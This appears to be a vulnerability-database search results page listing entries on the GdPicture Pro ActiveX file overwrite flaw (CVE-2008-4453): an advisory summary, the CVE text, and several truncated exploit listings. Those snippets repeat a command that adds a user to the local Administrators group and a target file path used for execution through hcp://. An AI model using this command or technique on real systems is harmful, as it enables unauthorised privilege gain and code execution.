7 matches found
GdPicture Pro 'gdpicture4s.ocx' ActiveX控件任意文件覆盖漏洞
BUGTRAQ ID:31504 CNCAN ID:CNCAN-2008100305 GdPicture Pro是一款支持多格式的图像管理软件。 GdPicture Pro包含的gdpicture4s.ocx ActiveX控件存在设计错误,远程攻击者可以利用漏洞以应用程序权限覆盖系统文件。 SaveAsPDF方法允许通过sFilePath参数建立和覆盖文件,通过使用其他参数,如sTitle,攻击者可以注入HTML代码,使用hcp://协议执行。GdPicturePro5.Imaging也存在此漏洞。 GdPicture GdPicture Pro GdPicture GdPicture...
CVE-2008-4453
The GdPicture 1 Light Imaging Toolkit 4.7.1 GdPicture4S.Imaging ActiveX control gdpicture4s.ocx 4.7.0.1 and 2 Pro Imaging SDK 5.7.1 GdPicturePro5S.Imaging ActiveX control gdpicturepro5s.ocx 5.7.0.1 allows remote attackers to create, overwrite, and modify arbitrary files via the SaveAsPDF method...
GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit
No description provided by source. !-- --------------------------------------------------------------------------------- GdPicture Pro ActiveX gdpicture4s.ocx Remote File Overwrite / Execution Exploit --------------------------------------------------------------------------------- author...: Egi...
gdpicture-exec.txt
var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add"; var outFile = "c:\windows\pchealth\helpctr\system\errors\badurl.htm"; var BMP = "\x42\x4d\x42\x00\x0...
GdPicture Pro - ActiveX gdpicture4s.ocx File Overwrite Exec
GdPicture Pro - ActiveX gdpicture4s.ocx File Overwrite Exec var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add"; var outFile = "c:\windows\pchealth\helpctr\system\errors\badurl.htm"; var BMP = "\x42\x4d\x4...
GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit
Exploit for unknown platform in category remote exploits ===================================================================== GdPicture Pro ActiveX gdpicture4s.ocx File Overwrite / Exec Exploit ===================================================================== object...
GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec
var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add"; var outFile = "c:\windows\pchealth\helpctr\system\errors\badurl.htm"; var BMP = "\x42\x4d\x42\x00\x00\x00\x00...